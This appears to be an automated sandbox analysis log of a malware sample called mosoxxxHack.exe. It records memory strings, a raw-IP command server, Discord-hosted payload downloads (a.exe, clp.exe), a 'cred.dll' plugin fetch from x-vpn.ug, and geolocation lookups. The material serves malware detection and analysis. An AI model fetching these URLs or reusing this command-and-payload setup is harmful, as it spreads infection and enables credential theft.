Source: mosoxxxHack.exe, 00000001.00000002.362525513.0000000003111000.00000004.00000001.sdmp	String found in binary or memory: http://91.142.79.35:13400/
Source: mosoxxxHack.exe, 00000001.00000002.362925140.00000000031A1000.00000004.00000001.sdmp	String found in binary or memory: http://91.142.79.35:134004
Source: mosoxxxHack.exe, 00000001.00000002.365271341.0000000003591000.00000004.00000001.sdmp	String found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.exe
Source: mosoxxxHack.exe, 00000001.00000002.362925140.00000000031A1000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
Source: mosoxxxHack.exe, 00000001.00000002.362698588.0000000003187000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/CloudflareIncRSACA-2.crt0
Source: mosoxxxHack.exe, 00000001.00000002.362925140.00000000031A1000.00000004.00000001.sdmp	String found in binary or memory: http://cdn.discordapp.com
Source: powershell.exe, 00000017.00000003.411512057.0000000008077000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: mosoxxxHack.exe, 00000001.00000002.362925140.00000000031A1000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
Source: mosoxxxHack.exe, 00000001.00000002.362698588.0000000003187000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/CloudflareIncRSACA-2.crl07
Source: mosoxxxHack.exe, 00000001.00000003.335030579.0000000006CFF000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
Source: mosoxxxHack.exe, 00000001.00000002.362925140.00000000031A1000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0
Source: mosoxxxHack.exe, 00000001.00000002.362698588.0000000003187000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/CloudflareIncRSACA-2.crl0
Source: mosoxxxHack.exe, 00000001.00000002.365271341.0000000003591000.00000004.00000001.sdmp	String found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
Source: a.exe, 00000011.00000002.424805140.0000000005C00000.00000002.00000001.sdmp, drbux.exe, 0000001A.00000002.501834007.00000000063A0000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: mosoxxxHack.exe, 00000001.00000002.365271341.0000000003591000.00000004.00000001.sdmp	String found in binary or memory: http://forms.rea
Source: mosoxxxHack.exe, 00000001.00000002.365271341.0000000003591000.00000004.00000001.sdmp	String found in binary or memory: http://forms.real.com/real/realone/download.html?type=rpsp_us
Source: mosoxxxHack.exe, 00000001.00000002.365271341.0000000003591000.00000004.00000001.sdmp	String found in binary or memory: http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl
Source: mosoxxxHack.exe, 00000001.00000002.365271341.0000000003591000.00000004.00000001.sdmp	String found in binary or memory: http://go.micros
Source: mosoxxxHack.exe, 00000001.00000003.354953199.0000000008EC0000.00000004.00000001.sdmp	String found in binary or memory: http://ns.ado/1
Source: mosoxxxHack.exe, 00000001.00000003.326766040.0000000008EB1000.00000004.00000001.sdmp	String found in binary or memory: http://ns.ado/1YMq08
Source: mosoxxxHack.exe, 00000001.00000003.354953199.0000000008EC0000.00000004.00000001.sdmp	String found in binary or memory: http://ns.adobe.c/g
Source: mosoxxxHack.exe, 00000001.00000003.326766040.0000000008EB1000.00000004.00000001.sdmp	String found in binary or memory: http://ns.adobe.c/gYMq08
Source: mosoxxxHack.exe, 00000001.00000003.354953199.0000000008EC0000.00000004.00000001.sdmp	String found in binary or memory: http://ns.adobe.cobj
Source: mosoxxxHack.exe, 00000001.00000003.326766040.0000000008EB1000.00000004.00000001.sdmp	String found in binary or memory: http://ns.adobe.cobjYMq08
Source: mosoxxxHack.exe, 00000001.00000003.326766040.0000000008EB1000.00000004.00000001.sdmp	String found in binary or memory: http://ns.d
Source: mosoxxxHack.exe, 00000001.00000002.362925140.00000000031A1000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: mosoxxxHack.exe, 00000001.00000003.335030579.0000000006CFF000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: mosoxxxHack.exe, 00000001.00000002.362925140.00000000031A1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.datacontract.org/2004/07/
Source: mosoxxxHack.exe, 00000001.00000002.362525513.0000000003111000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: mosoxxxHack.exe, 00000001.00000002.362638190.000000000315D000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: mosoxxxHack.exe, 00000001.00000002.362638190.000000000315D000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/D
Source: mosoxxxHack.exe, 00000001.00000002.362525513.0000000003111000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: mosoxxxHack.exe, 00000001.00000002.362525513.0000000003111000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
Source: mosoxxxHack.exe, 00000001.00000002.362525513.0000000003111000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: mosoxxxHack.exe, 00000001.00000002.362525513.0000000003111000.00000004.00000001.sdmp, a.exe, 00000011.00000002.405983736.0000000002A51000.00000004.00000001.sdmp, drbux.exe, 0000001A.00000002.464357742.00000000031F1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: mosoxxxHack.exe, 00000001.00000002.365271341.0000000003591000.00000004.00000001.sdmp	String found in binary or memory: http://service.r
Source: mosoxxxHack.exe, 00000001.00000002.365271341.0000000003591000.00000004.00000001.sdmp	String found in binary or memory: http://service.real.com/realplayer/security/02062012_player/en/
Source: mosoxxxHack.exe, 00000001.00000002.365271341.0000000003591000.00000004.00000001.sdmp	String found in binary or memory: http://support.a
Source: mosoxxxHack.exe, 00000001.00000002.365271341.0000000003591000.00000004.00000001.sdmp	String found in binary or memory: http://support.apple.com/kb/HT203092
Source: mosoxxxHack.exe, 00000001.00000002.362638190.000000000315D000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/
Source: mosoxxxHack.exe, 00000001.00000002.362525513.0000000003111000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/0
Source: mosoxxxHack.exe, 00000001.00000002.362525513.0000000003111000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
Source: mosoxxxHack.exe, 00000001.00000002.362525513.0000000003111000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
Source: mosoxxxHack.exe, 00000001.00000002.362525513.0000000003111000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
Source: mosoxxxHack.exe, 00000001.00000002.362525513.0000000003111000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
Source: mosoxxxHack.exe, 00000001.00000002.362925140.00000000031A1000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
Source: mosoxxxHack.exe, 00000001.00000002.362525513.0000000003111000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
Source: mosoxxxHack.exe, 00000001.00000002.365082408.000000000353E000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnviron
Source: mosoxxxHack.exe, 00000001.00000002.365082408.000000000353E000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
Source: mosoxxxHack.exe, 00000001.00000002.362525513.0000000003111000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
Source: mosoxxxHack.exe, 00000001.00000002.362525513.0000000003111000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentme(
Source: mosoxxxHack.exe, 00000001.00000002.363423689.00000000032D4000.00000004.00000001.sdmp, mosoxxxHack.exe, 00000001.00000002.362698588.0000000003187000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
Source: mosoxxxHack.exe, 00000001.00000002.362525513.0000000003111000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
Source: mosoxxxHack.exe, 00000001.00000002.362638190.000000000315D000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/t_
Source: a.exe, 00000011.00000002.424805140.0000000005C00000.00000002.00000001.sdmp, drbux.exe, 0000001A.00000002.501834007.00000000063A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: a.exe, 00000011.00000002.424805140.0000000005C00000.00000002.00000001.sdmp, drbux.exe, 0000001A.00000002.501834007.00000000063A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: mosoxxxHack.exe, 00000001.00000002.362925140.00000000031A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.digicert.com/CPS0v
Source: a.exe, 00000011.00000002.405780557.00000000011A7000.00000004.00000040.sdmp, drbux.exe, 0000001A.00000002.501834007.00000000063A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: drbux.exe, 0000001A.00000002.501834007.00000000063A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: a.exe, 00000011.00000002.424805140.0000000005C00000.00000002.00000001.sdmp, drbux.exe, 0000001A.00000002.501834007.00000000063A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: a.exe, 00000011.00000002.424805140.0000000005C00000.00000002.00000001.sdmp, drbux.exe, 0000001A.00000002.501834007.00000000063A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: a.exe, 00000011.00000002.424805140.0000000005C00000.00000002.00000001.sdmp, drbux.exe, 0000001A.00000002.501834007.00000000063A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: a.exe, 00000011.00000002.424805140.0000000005C00000.00000002.00000001.sdmp, drbux.exe, 0000001A.00000002.501834007.00000000063A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: a.exe, 00000011.00000002.424805140.0000000005C00000.00000002.00000001.sdmp, drbux.exe, 0000001A.00000002.501834007.00000000063A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: a.exe, 00000011.00000002.424805140.0000000005C00000.00000002.00000001.sdmp, drbux.exe, 0000001A.00000002.501834007.00000000063A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: a.exe, 00000011.00000002.405780557.00000000011A7000.00000004.00000040.sdmp	String found in binary or memory: http://www.fontbureau.comcomm
Source: a.exe, 00000011.00000002.405780557.00000000011A7000.00000004.00000040.sdmp	String found in binary or memory: http://www.fontbureau.comoitu
Source: a.exe, 00000011.00000002.424805140.0000000005C00000.00000002.00000001.sdmp, drbux.exe, 0000001A.00000002.501834007.00000000063A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: a.exe, 00000011.00000002.424805140.0000000005C00000.00000002.00000001.sdmp, drbux.exe, 0000001A.00000002.501834007.00000000063A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: a.exe, 00000011.00000002.424805140.0000000005C00000.00000002.00000001.sdmp, drbux.exe, 0000001A.00000002.501834007.00000000063A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: a.exe, 00000011.00000002.424805140.0000000005C00000.00000002.00000001.sdmp, drbux.exe, 0000001A.00000002.501834007.00000000063A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: a.exe, 00000011.00000002.424805140.0000000005C00000.00000002.00000001.sdmp, drbux.exe, 0000001A.00000002.501834007.00000000063A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: a.exe, 00000011.00000002.424805140.0000000005C00000.00000002.00000001.sdmp, drbux.exe, 0000001A.00000002.501834007.00000000063A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: a.exe, 00000011.00000002.424805140.0000000005C00000.00000002.00000001.sdmp, drbux.exe, 0000001A.00000002.501834007.00000000063A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: mosoxxxHack.exe, 00000001.00000002.365271341.0000000003591000.00000004.00000001.sdmp	String found in binary or memory: http://www.google.com/earth/explore/products/plugin.html
Source: mosoxxxHack.exe, 00000001.00000002.365271341.0000000003591000.00000004.00000001.sdmp	String found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chrome
Source: a.exe, 00000011.00000002.424805140.0000000005C00000.00000002.00000001.sdmp, drbux.exe, 0000001A.00000002.501834007.00000000063A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: a.exe, 00000011.00000002.424805140.0000000005C00000.00000002.00000001.sdmp, drbux.exe, 0000001A.00000002.501834007.00000000063A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: a.exe, 00000011.00000002.424805140.0000000005C00000.00000002.00000001.sdmp, drbux.exe, 0000001A.00000002.501834007.00000000063A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: a.exe, 00000011.00000002.424805140.0000000005C00000.00000002.00000001.sdmp, drbux.exe, 0000001A.00000002.501834007.00000000063A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: drbux.exe, 0000001A.00000002.501834007.00000000063A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: a.exe, 00000011.00000002.424805140.0000000005C00000.00000002.00000001.sdmp, drbux.exe, 0000001A.00000002.501834007.00000000063A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: a.exe, 00000011.00000002.424805140.0000000005C00000.00000002.00000001.sdmp, drbux.exe, 0000001A.00000002.501834007.00000000063A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: a.exe, 00000011.00000002.424805140.0000000005C00000.00000002.00000001.sdmp, drbux.exe, 0000001A.00000002.501834007.00000000063A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: mosoxxxHack.exe, 00000001.00000002.365271341.0000000003591000.00000004.00000001.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: mosoxxxHack.exe, 00000001.00000002.362638190.000000000315D000.00000004.00000001.sdmp	String found in binary or memory: https://api.ip.sb/geoip
Source: mosoxxxHack.exe, 00000001.00000002.359931593.00000000027E0000.00000004.00000001.sdmp	String found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
Source: mosoxxxHack.exe, 00000001.00000002.362638190.000000000315D000.00000004.00000001.sdmp	String found in binary or memory: https://api.ip.sbP
Source: mosoxxxHack.exe, 00000001.00000002.359931593.00000000027E0000.00000004.00000001.sdmp	String found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
Source: mosoxxxHack.exe, 00000001.00000002.362925140.00000000031A1000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com(
Source: mosoxxxHack.exe, 00000001.00000002.362925140.00000000031A1000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/710557342755848243/876828927182663711/a.exe
Source: mosoxxxHack.exe, 00000001.00000002.362925140.00000000031A1000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/710557342755848243/876828927182663711/a.exe(
Source: mosoxxxHack.exe, 00000001.00000002.362925140.00000000031A1000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com4
Source: mosoxxxHack.exe, 00000001.00000002.365271341.0000000003591000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: mosoxxxHack.exe, 00000001.00000002.365271341.0000000003591000.00000004.00000001.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: mosoxxxHack.exe, 00000001.00000002.365271341.0000000003591000.00000004.00000001.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: mosoxxxHack.exe, 00000001.00000002.365271341.0000000003591000.00000004.00000001.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: mosoxxxHack.exe, 00000001.00000002.365271341.0000000003591000.00000004.00000001.sdmp	String found in binary or memory: https://get.adob
Source: powershell.exe, 00000017.00000003.550499898.0000000005966000.00000004.00000001.sdmp	String found in binary or memory: https://go.microh
Source: mosoxxxHack.exe, 00000001.00000002.365271341.0000000003591000.00000004.00000001.sdmp	String found in binary or memory: https://helpx.ad
Source: mosoxxxHack.exe, 00000001.00000002.359931593.00000000027E0000.00000004.00000001.sdmp	String found in binary or memory: https://ipinfo.io/ip%appdata%
Source: mosoxxxHack.exe, 00000001.00000002.362925140.00000000031A1000.00000004.00000001.sdmp, mosoxxxHack.exe, 00000001.00000002.362893558.000000000319C000.00000004.00000001.sdmp	String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: mosoxxxHack.exe, 00000001.00000002.365271341.0000000003591000.00000004.00000001.sdmp	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: mosoxxxHack.exe, 00000001.00000002.365271341.0000000003591000.00000004.00000001.sdmp	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: mosoxxxHack.exe, 00000001.00000002.365271341.0000000003591000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
Source: mosoxxxHack.exe, 00000001.00000002.365271341.0000000003591000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: mosoxxxHack.exe, 00000001.00000002.365271341.0000000003591000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_java
Source: mosoxxxHack.exe, 00000001.00000002.365271341.0000000003591000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_pdf
Source: mosoxxxHack.exe, 00000001.00000002.365271341.0000000003591000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_quicktime
Source: mosoxxxHack.exe, 00000001.00000002.365271341.0000000003591000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_real
Source: mosoxxxHack.exe, 00000001.00000002.365271341.0000000003591000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
Source: mosoxxxHack.exe, 00000001.00000002.365271341.0000000003591000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
Source: mosoxxxHack.exe, 00000001.00000002.365271341.0000000003591000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/answer/6258784
Source: mosoxxxHack.exe, 00000001.00000003.335030579.0000000006CFF000.00000004.00000001.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: mosoxxxHack.exe, 00000001.00000002.365271341.0000000003591000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: unknown

DNS traffic detected: queries for: api.ip.sb

Source: C:\Users\user\AppData\Local\Temp\a.exe

Code function: 25_2_004068F0 InternetCloseHandle,InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

25_2_004068F0

Source: global traffic	HTTP traffic detected: GET /hfV3vDtt/plugins/cred.dll HTTP/1.1Host: x-vpn.ug
Source: global traffic	HTTP traffic detected: GET /attachments/710557342755848243/876828681815871488/clp.exe HTTP/1.1Host: cdn.discordapp.com

Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723

Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.79.35
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.79.35
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.79.35
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.79.35
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.79.35
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.79.35
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.79.35
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.79.35
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.79.35
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.79.35
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.79.35
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.79.35
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.79.35
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.79.35
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.79.35
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.79.35
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.79.35
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.79.35
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.79.35
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.79.35
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.79.35
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.79.35
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.79.35
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.79.35
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.79.35
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.79.35
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.79.35
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.79.35
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.79.35
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.79.35
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.79.35
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.79.35
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.79.35
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.79.35
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.79.35
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.79.35
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.79.35
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.79.35
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.79.35
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.79.35
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.79.35
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.79.35
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.79.35
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.79.35
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.79.35
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.79.35
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.79.35
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.79.35
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.79.35
Source: unknown	TCP traffic detected without corresponding DNS query: 91.142.79.35

Source: mosoxxxHack.exe, 00000001.00000002.365271341.0000000003591000.00000004.00000001.sdmp	String found in binary or memory: ium PDF Plugin","versions":[{"comment":"Chromium PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"divx-player":{"group_name_matcher":"DivX Web Player","help_url":"https://support.google.com/chrome/?p=plugin_divx","lang":"en-US","mime_types":["video/divx","video/x-matroska"],"name":"DivX Web Player","url":"http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe","versions":[{"status":"requires_authorization","version":"1.4.3.4"}]},"facebook-video-calling":{"group_name_matcher":"Facebook Video","lang":"en-US","mime_types":["application/skypesdk-plugin"],"name":"Facebook Video Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track version information for the Facebook Video Calling Plugin.","status":"requires_authorization","version":"0"}]},"google-chrome-pdf":{"group_name_matcher":"Chrome PDF Viewer","mime_types":[],"name":"Chrome PDF Viewer","versions":[{"comment":"Google Chrome PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"google-chrome-pdf-plugin":{"group_name_matcher":"Chrome PDF Plugin","mime_types":[],"name":"Chrome PDF Plugin","versions":[{"comment":"Google Chrome PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"google-earth":{"group_name_matcher":"Google Earth","lang":"en-US","mime_types":["application/geplugin"],"name":"Google Earth","url":"http://www.google.com/earth/explore/products/plugin.html","versions":[{"comment":"We do not track version information for the Google Earth Plugin.","status":"requires_authorization","version":"0"}]},"google-talk":{"group_name_matcher":"Google Talk","mime_types":[],"name":"Google Talk","versions":[{"comment":"'Google Talk Plugin' and 'Google Talk Plugin Video Accelerator' use two completely different versioning schemes, so we can't define a minimum version.","status":"requires_authorization","version":"0"}]},"google-update":{"group_name_matcher":"Google Update","mime-types":[],"name":"Google Update","versions":[{"comment":"Google Update plugin is versioned but kept automatically up to date","status":"requires_authorization","version":"0"}]},"ibm-java-runtime-environment":{"group_name_matcher":"IBMJava*","mime_types":["application/x-java-applet","application/x-java-applet;jpi-version=1.7.0_05","application/x-java-applet;version=1.1","application/x-java-applet;version=1.1.1","application/x-java-applet;version=1.1.2","application/x-java-applet;version=1.1.3","application/x-java-applet;version=1.2","application/x-java-applet;version=1.2.1","application/x-java-applet;version=1.2.2","application/x-java-applet;version=1.3","application/x-java-applet;version=1.3.1","application/x-java-applet;version=1.4","application/x-java-applet;version=1.4.1","application/x-java-applet;version=1.4.2","application/x-java-applet;version=1.5","application/x-java-applet;version=1.6","application/x-java-applet;version=1.7","application/x-java
Source: mosoxxxHack.exe, 00000001.00000002.365271341.0000000003591000.00000004.00000001.sdmp	String found in binary or memory: m9https://www.facebook.com/chat/video/videocalldownload.php equals www.facebook.com (Facebook)

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 91.142.79.35:13400Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.3:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.3:49723 version: TLS 1.2

Source: a.exe, 00000011.00000002.404320229.0000000000F19000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary:

PE file contains section with special chars

Show sources

Source: mosoxxxHack.exe	Static PE information: section name:
Source: mosoxxxHack.exe	Static PE information: section name:
Source: mosoxxxHack.exe	Static PE information: section name:
Source: mosoxxxHack.exe	Static PE information: section name:

Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 17_2_00622050	17_2_00622050
Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 17_2_00628210	17_2_00628210
Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 17_2_00ED0ACA	17_2_00ED0ACA
Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 17_2_00ED0AD8	17_2_00ED0AD8
Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 17_2_00ED0478	17_2_00ED0478
Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 17_2_04FDAF78	17_2_04FDAF78
Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 25_2_00414027	25_2_00414027
Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 25_2_00403180	25_2_00403180
Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 25_2_00422A27	25_2_00422A27
Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 25_2_00422B47	25_2_00422B47
Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 25_2_0041FB88	25_2_0041FB88
Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 25_2_00424D50	25_2_00424D50
Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 25_2_00423D9D	25_2_00423D9D
Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 25_2_0041F6F0	25_2_0041F6F0
Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 25_2_005F2050	25_2_005F2050
Source: C:\Users\user\AppData\Local\Temp\a.exe	Code function: 25_2_005F8210	25_2_005F8210
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Code function: 26_2_00D72050	26_2_00D72050
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Code function: 26_2_00D78210	26_2_00D78210
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Code function: 26_2_02FD3EE1	26_2_02FD3EE1
Source: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe	Code function: 26_2_02FD0AD8	26_2_02FD0AD8
